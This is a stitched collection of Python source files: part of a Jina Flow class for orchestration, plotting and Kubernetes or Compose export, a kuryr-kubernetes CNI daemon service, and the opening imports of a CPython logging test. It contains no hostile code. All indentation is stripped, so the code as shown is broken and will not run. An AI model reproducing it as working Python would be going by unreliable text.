deployment_nodes = []
# plot subgraphs
for node, v in self._deployment_nodes.items():
deployment_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._deployment_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._deployment_nodes[need].role
_e_role = self._deployment_nodes[node].role
if self._deployment_nodes[need].external:
_s_role = 'EXTERNAL'
if self._deployment_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if (
_s_role == DeploymentRoleType.INSPECT
or _e_role == DeploymentRoleType.INSPECT
):
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.JOIN_INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point.
If a file name is provided, an image (svg or jpg, depending on the suffix) is created with that name;
otherwise the mermaid URL is displayed.
If called within an IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='deployment_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow before plotting so that the gateway connection is shown correctly
:param copy_flow: when set to True, always copy the current Flow, apply the
modification on the copy and return it; otherwise modify the Flow in place
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import Image, display
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL that points to an SVG. It needs an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the URL that points to the SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].port
else:
return self._common_kwargs.get('port', None)
@port.setter
def port(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port'] = value
# the Flow has already been built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port = self._common_kwargs['port']
# the Flow is already running, so restart the gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new host to set
"""
self._common_kwargs['host'] = value
# the Flow has already been built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# the Flow is already running, so restart the gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._deployment_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port}/redoc',
'cyan',
attrs='underline',
)
)
if not self.args.no_graphql_endpoint:
address_table.append(
f'\t💬 GraphQL UI:\t\t'
+ colored(
f'http://localhost:{self.port}/graphql',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
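# Illustrative sketch (not part of the original source): a typical serving loop keeps the
# Flow alive until interrupted, e.g.
#     with Flow(protocol='http', port=12345).add(uses='encoder.yml') as f:
#         f.block()  # returns on KeyboardInterrupt or when the stop event is set
# 'encoder.yml' and port 12345 are hypothetical values.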
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# the Flow is already running, the protocol can no longer be changed
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# the Flow has already been built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
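# Illustrative sketch (not part of the original source): protocol and port can be changed
# on a Flow before it is started, e.g.
#     f = Flow(port=12345)
#     f.protocol = 'http'  # parsed via GatewayProtocolType.from_string
#     f.port = 23456       # re-exposes the gateway if the Flow is already running
# the port numbers are hypothetical.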
def __getitem__(self, item):
if isinstance(item, str):
return self._deployment_nodes[item]
elif isinstance(item, int):
return list(self._deployment_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
if self.args.workspace is not None:
return os.path.abspath(self.args.workspace)
else:
return None
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all deployments
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pod_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Deployments' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Deployments' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'pod_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "pod_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, list):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all deployments.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
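# Illustrative sketch (not part of the original source): with an HTTP gateway, an Executor
# endpoint can be surfaced as a REST path, e.g.
#     f = Flow(protocol='http', port=12345)
#     f.expose_endpoint('/foo', summary='run the hypothetical /foo endpoint')
#     # once the Flow is running, a POST to http://localhost:12345/foo reaches @requests(on='/foo')
# '/foo' and port 12345 are hypothetical values.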
# kept for backward compatibility
join = needs
def rolling_update(
self,
deployment_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a deployment sequentially
:param deployment_name: deployment to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from jina.helper import run_async
run_async(
self._deployment_nodes[deployment_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
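# Illustrative sketch (not part of the original source): replicas of a named deployment can
# be reloaded in place while the Flow is running, e.g.
#     with f:  # `f` is a running Flow that contains an 'indexer' deployment
#         f.rolling_update('indexer', uses_with={'param': 'new-value'})
# 'indexer' and 'param' are hypothetical names.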
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating whether the Kubernetes connection pool should be used inside the Executor Runtimes.
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.deployments.config.k8s import K8sDeploymentConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._deployment_nodes.items():
if v.external:
continue
deployment_base = os.path.join(output_base_path, node)
k8s_deployment = K8sDeploymentConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_deployments_addresses=self._get_k8s_deployments_addresses(
k8s_namespace, k8s_connection_pool
)
if node == 'gateway'
else None,
)
configs = k8s_deployment.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(deployment_base, f'{name}.yml')
os.makedirs(deployment_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
self.logger.info(
f'K8s yaml files have been created under {output_base_path}. You can deploy them by running `kubectl apply -R -f {output_base_path}`'
)
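# Illustrative sketch (not part of the original source): dumping and applying the generated
# Kubernetes configuration, e.g.
#     f = Flow(name='my-flow').add(uses='jinahub+docker://Executor1')
#     f.to_k8s_yaml('./k8s_out', k8s_namespace='my-flow')
#     # then: kubectl apply -R -f ./k8s_out
# 'my-flow', './k8s_out' and 'Executor1' are hypothetical values.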
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployments
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.deployments.config.docker_compose import (
DockerComposeConfig,
)
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._deployment_nodes.items():
docker_compose_deployment = DockerComposeConfig(
args=v.args,
deployments_addresses=self._get_docker_compose_deployments_addresses(),
)
service_configs = docker_compose_deployment.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
# output_path always has a value at this point (it defaults to 'docker-compose.yml'), so pass it explicitly
command = f'docker-compose -f {output_path} up'
self.logger.info(
f'Docker compose file has been created under {output_path}. You can use it by running `{command}`'
)
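# Illustrative sketch (not part of the original source): generating a Compose file and
# starting it, e.g.
#     f = Flow().add(uses='jinahub+docker://Executor1')
#     f.to_docker_compose_yaml('my-compose.yml', network_name='my-net')
#     # then: docker-compose -f my-compose.yml up
# 'Executor1', 'my-compose.yml' and 'my-net' are hypothetical values.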
def scale(
self,
deployment_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param deployment_name: deployment to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._deployment_nodes[deployment_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
kwargs = copy.deepcopy(self._common_kwargs)
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
service.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_bool
import errno
from http import client as httplib
import multiprocessing
import os
import queue
import sys
import threading
import time
import urllib.parse
import urllib3
import cotyledon
import flask
import pyroute2
from pyroute2.ipdb import transactional
from werkzeug import serving
import os_vif
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr_kubernetes import clients
from kuryr_kubernetes.cni import handlers as h_cni
from kuryr_kubernetes.cni import health
from kuryr_kubernetes.cni.plugins import k8s_cni_registry
from kuryr_kubernetes.cni import prometheus_exporter
from kuryr_kubernetes.cni import utils as cni_utils
from kuryr_kubernetes import config
from kuryr_kubernetes import constants as k_const
from kuryr_kubernetes import exceptions
from kuryr_kubernetes import objects
from kuryr_kubernetes import utils
from kuryr_kubernetes import watcher as k_watcher
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
HEALTH_CHECKER_DELAY = 5
ErrInvalidEnvironmentVariables = 4
ErrTryAgainLater = 11
ErrInternal = 999
class DaemonServer(object):
def __init__(self, plugin, healthy, metrics):
self.ctx = None
self.plugin = plugin
self.healthy = healthy
self.metrics = metrics
self.failure_count = multiprocessing.Value('i', 0)
self.application = flask.Flask('kuryr-daemon')
self.application.add_url_rule(
'/addNetwork', methods=['POST'], view_func=self.add)
self.application.add_url_rule(
'/delNetwork', methods=['POST'], view_func=self.delete)
self.headers = {'ContentType': 'application/json',
'Connection': 'close'}
self._server = None
def _prepare_request(self):
params = cni_utils.CNIParameters(flask.request.get_json())
LOG.debug('Received %s request. CNI Params: %s',
params.CNI_COMMAND, params)
return params
def _error(self, error_code, message, details=""):
template = {
"code": error_code,
"msg": message,
"details": details
}
data = jsonutils.dumps(template)
return data
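# Illustrative sketch (not part of the original source): the JSON body handed back to the
# CNI plugin looks roughly like
#     {"code": 11, "msg": "Try Again Later.", "details": "..."}
# where 11 corresponds to ErrTryAgainLater above.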
def _update_metrics(self, command, error, duration):
"""Add a new metric value to the shared metrics dict"""
labels = {'command': command, 'error': error}
self.metrics.put({'labels': labels, 'duration': duration})
@cni_utils.measure_time('ADD')
def add(self):
try:
params = self._prepare_request()
except Exception:
self._check_failure()
LOG.exception('Exception when reading CNI params.')
error = self._error(ErrInvalidEnvironmentVariables,
"Required CNI params missing.")
return error, httplib.BAD_REQUEST, self.headers
try:
vif = self.plugin.add(params)
data = jsonutils.dumps(vif.obj_to_primitive())
except exceptions.CNITimeout as e:
LOG.exception('Timeout on ADD request')
error = self._error(ErrTryAgainLater, f"{e}. Try Again Later.")
return error, httplib.GATEWAY_TIMEOUT, self.headers
except pyroute2.NetlinkError as e:
if e.code == errno.EEXIST:
self._check_failure()
LOG.warning(
f'Creation of pod interface failed due to VLAN ID '
f'conflict. Probably the CRI had not cleaned up the '
f'network namespace of deleted pods. Attempting to retry.')
error = self._error(ErrTryAgainLater,
"Creation of pod interface failed due to "
"VLAN ID conflict. Try Again Later")
return error, httplib.GATEWAY_TIMEOUT, self.headers
raise
except Exception:
if not self.healthy.value:
error = self._error(ErrInternal,
"Maximum CNI ADD Failures Reached.",
"Error when processing addNetwork request."
" CNI Params: {}".format(params))
else:
self._check_failure()
error = self._error(ErrInternal,
"Error processing request",
"Failure processing addNetwork request. "
"CNI Params: {}".format(params))
LOG.exception('Error when processing addNetwork request. CNI '
'Params: %s', params)
return error, httplib.INTERNAL_SERVER_ERROR, self.headers
return data, httplib.ACCEPTED, self.headers
@cni_utils.measure_time('DEL')
def delete(self):
try:
params = self._prepare_request()
except Exception:
LOG.exception('Exception when reading CNI params.')
error = self._error(ErrInvalidEnvironmentVariables,
"Required CNI params missing.")
return error, httplib.BAD_REQUEST, self.headers
try:
self.plugin.delete(params)
except exceptions.CNIKuryrPortTimeout:
# NOTE(dulek): It's better to ignore this error - most of the time
# it will happen when pod is long gone and CRI
# overzealously tries to delete it from the network.
# We cannot really do anything without VIF annotation,
# so let's just tell CRI to move along.
LOG.warning('Error when processing delNetwork request. '
'Ignoring this error, pod is most likely gone')
return '', httplib.NO_CONTENT, self.headers
except Exception:
if not self.healthy.value:
error = self._error(ErrInternal,
"Maximum CNI DEL Failures Reached.",
"Error processing delNetwork request. "
"CNI Params: {}".format(params))
else:
self._check_failure()
error = self._error(ErrInternal,
"Error processing request",
"Failure processing delNetwork request. "
"CNI Params: {}".format(params))
LOG.exception('Error when processing delNetwork request. CNI '
'Params: %s.', params)
return error, httplib.INTERNAL_SERVER_ERROR, self.headers
return '', httplib.NO_CONTENT, self.headers
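# Illustrative sketch (not part of the original source): the CNI plugin talks to this server
# over HTTP; a request is the JSON-encoded set of CNI parameters, e.g.
#     POST /addNetwork  {"CNI_COMMAND": "ADD", "CNI_CONTAINERID": "...", ...}
# which `_prepare_request` wraps into `cni_utils.CNIParameters`; the exact field set is
# defined by the CNI spec and kuryr's plugin, not shown here.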
def run(self):
server_pair = CONF.cni_daemon.bind_address
LOG.info('Starting server on %s.', server_pair)
try:
address, port = server_pair.split(':')
port = int(port)
except ValueError:
LOG.exception('Cannot start server on %s.', server_pair)
raise
if CONF.cni_daemon.worker_num <= 1:
msg = ('[cni_daemon]worker_num needs to be set to a value higher '
'than 1')
LOG.critical(msg)
raise exceptions.InvalidKuryrConfiguration(msg)
try:
self._server = serving.make_server(
address, port, self.application, threaded=False,
processes=CONF.cni_daemon.worker_num)
self._server.serve_forever()
except Exception:
LOG.exception('Failed to start kuryr-daemon.')
raise
def stop(self):
LOG.info("Waiting for DaemonServer worker processes to exit...")
self._server._block_on_close = True
self._server.shutdown()
self._server.server_close()
LOG.info("All DaemonServer workers finished gracefully.")
def _check_failure(self):
with self.failure_count.get_lock():
if self.failure_count.value < CONF.cni_daemon.cni_failures_count:
self.failure_count.value += 1
else:
with self.healthy.get_lock():
LOG.debug("Reporting maximum CNI ADD/DEL failures "
"reached.")
self.healthy.value = False
class CNIDaemonServerService(cotyledon.Service):
name = "server"
def __init__(self, worker_id, registry, healthy, metrics):
super(CNIDaemonServerService, self).__init__(worker_id)
self.registry = registry
self.healthy = healthy
self.plugin = k8s_cni_registry.K8sCNIRegistryPlugin(registry,
self.healthy)
self.metrics = metrics
self.server = DaemonServer(self.plugin, self.healthy, self.metrics)
def run(self):
# NOTE(dulek): We might do a *lot* of pyroute2 operations, let's
# make the pyroute2 timeout configurable to make sure
# kernel will have chance to catch up.
transactional.SYNC_TIMEOUT = CONF.cni_daemon.pyroute2_timeout
# Run HTTP server
self.server.run()
def terminate(self):
self.server.stop()
class CNIDaemonWatcherService(cotyledon.Service):
name = "watcher"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonWatcherService, self).__init__(worker_id)
self.pipeline = None
self.watcher = None
self.health_thread = None
self.registry = registry
self.healthy = healthy
def run(self):
self.pipeline = h_cni.CNIPipeline()
self.pipeline.register(h_cni.CallbackHandler(self.on_done,
self.on_deleted))
self.watcher = k_watcher.Watcher(self.pipeline)
query_label = urllib.parse.quote_plus(f'{k_const.KURYRPORT_LABEL}='
f'{utils.get_nodename()}')
self.watcher.add(f'{k_const.K8S_API_CRD_KURYRPORTS}'
f'?labelSelector={query_label}')
self.is_running = True
self.health_thread = threading.Thread(
target=self._start_watcher_health_checker)
self.health_thread.start()
self.watcher.start()
def _start_watcher_health_checker(self):
while self.is_running:
if not self.watcher.is_alive():
LOG.debug("Reporting watcher not healthy.")
with self.healthy.get_lock():
self.healthy.value = False
time.sleep(HEALTH_CHECKER_DELAY)
def on_done(self, kuryrport, vifs):
kp_name = utils.get_res_unique_name(kuryrport)
with lockutils.lock(kp_name, external=True):
if (kp_name not in self.registry or
self.registry[kp_name]['kp']['metadata']['uid']
!= kuryrport['metadata']['uid']):
self.registry[kp_name] = {'kp': kuryrport,
'vifs': vifs,
'containerid': None,
'vif_unplugged': False,
'del_received': False}
else:
old_vifs = self.registry[kp_name]['vifs']
for iface in vifs:
if old_vifs[iface].active != vifs[iface].active:
kp_dict = self.registry[kp_name]
kp_dict['vifs'] = vifs
self.registry[kp_name] = kp_dict
def on_deleted(self, kp):
kp_name = utils.get_res_unique_name(kp)
try:
if kp_name in self.registry:
# NOTE(ndesh): We need to lock here to avoid race condition
# with the deletion code for CNI DEL so that
# we delete the registry entry exactly once
with lockutils.lock(kp_name, external=True):
if self.registry[kp_name]['vif_unplugged']:
del self.registry[kp_name]
else:
kp_dict = self.registry[kp_name]
kp_dict['del_received'] = True
self.registry[kp_name] = kp_dict
except KeyError:
# This means someone else removed it. It's odd but safe to ignore.
LOG.debug('KuryrPort %s entry already removed from registry while '
'handling DELETED event. Ignoring.', kp_name)
pass
def terminate(self):
self.is_running = False
if self.health_thread:
self.health_thread.join()
if self.watcher:
self.watcher.stop()
class CNIDaemonHealthServerService(cotyledon.Service):
name = "health"
def __init__(self, worker_id, healthy):
super(CNIDaemonHealthServerService, self).__init__(worker_id)
self.health_server = health.CNIHealthServer(healthy)
def run(self):
self.health_server.run()
class CNIDaemonExporterService(cotyledon.Service):
name = "Prometheus Exporter"
def __init__(self, worker_id, metrics):
super(CNIDaemonExporterService, self).__init__(worker_id)
self.prometheus_exporter = prometheus_exporter.CNIPrometheusExporter()
self.is_running = True
self.metrics = metrics
self.exporter_thread = threading.Thread(
target=self._start_metric_updater)
self.exporter_thread.start()
def _start_metric_updater(self):
while self.is_running:
try:
metric = self.metrics.get(timeout=1)
except queue.Empty:
continue
labels = metric['labels']
duration = metric['duration']
self.prometheus_exporter.update_metric(labels, duration)
def terminate(self):
self.is_running = False
if self.exporter_thread:
self.exporter_thread.join()
def run(self):
self.prometheus_exporter.run()
class CNIDaemonServiceManager(cotyledon.ServiceManager):
def __init__(self):
# NOTE(mdulko): Default shutdown timeout is 60 seconds and K8s won't
# wait more by default anyway.
super(CNIDaemonServiceManager, self).__init__()
self._server_service = None
# TODO(dulek): Use cotyledon.oslo_config_glue to support conf reload.
# TODO(vikasc): Should be done using dynamically loadable OVO types
# plugin.
objects.register_locally_defined_vifs()
os_vif.initialize()
clients.setup_kubernetes_client()
if CONF.sriov.enable_pod_resource_service:
clients.setup_pod_resources_client()
self.manager = multiprocessing.Manager()
registry = self.manager.dict() # For Watcher->Server communication.
healthy = multiprocessing.Value(c_bool, True)
metrics = self.manager.Queue()
self.add(CNIDaemonWatcherService, workers=1, args=(registry, healthy,))
self._server_service = self.add(CNIDaemonServerService, workers=1,
args=(registry, healthy, metrics,))
self.add(CNIDaemonHealthServerService, workers=1, args=(healthy,))
self.add(CNIDaemonExporterService, workers=1, args=(metrics,))
def shutdown_hook(service_id, worker_id, exit_code):
LOG.critical(f'Child Service {service_id} had exited with code '
f'{exit_code}, stopping kuryr-daemon')
self.shutdown()
self.register_hooks(on_terminate=self.terminate,
on_dead_worker=shutdown_hook)
def run(self):
# FIXME(darshna): Remove pyroute2 IPDB deprecation warning, remove
# once we stop using pyroute2.IPDB.
logging.getLogger('pyroute2').setLevel(logging.ERROR)
logging.getLogger('pr2modules.ipdb.main').setLevel(logging.ERROR)
reaper_thread = threading.Thread(target=self._zombie_reaper,
daemon=True)
self._terminate_called = threading.Event()
reaper_thread.start()
super(CNIDaemonServiceManager, self).run()
def _zombie_reaper(self):
while True:
try:
res = os.waitpid(-1, os.WNOHANG)
# don't sleep or stop if a zombie process was found
# as there could be more
if res != (0, 0):
continue
except ChildProcessError:
# There are no child processes yet (or they have been killed)
pass
except os.error:
LOG.exception("Got OS error while reaping zombie processes")
if self._terminate_called.is_set():
break
time.sleep(1)
def terminate(self):
self._terminate_called.set()
if self._server_service:
LOG.info("Gracefully stopping DaemonServer service..")
self.reconfigure(self._server_service, 0)
for worker in self._running_services[self._server_service]:
worker.terminate()
for worker in self._running_services[self._server_service]:
worker.join()
LOG.info("Stopping registry manager...")
self.manager.shutdown()
LOG.info("Continuing with shutdown")
def start():
urllib3.disable_warnings()
config.init(sys.argv[1:])
config.setup_logging()
CNIDaemonServiceManager().run()
|
test_logging.py
|
# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2021 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import socket_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
